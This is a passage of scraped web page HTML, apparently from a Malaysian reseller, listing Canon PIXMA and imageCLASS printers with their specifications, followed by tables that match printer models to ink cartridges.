2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p><br />ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p><br />Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p><br />Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td 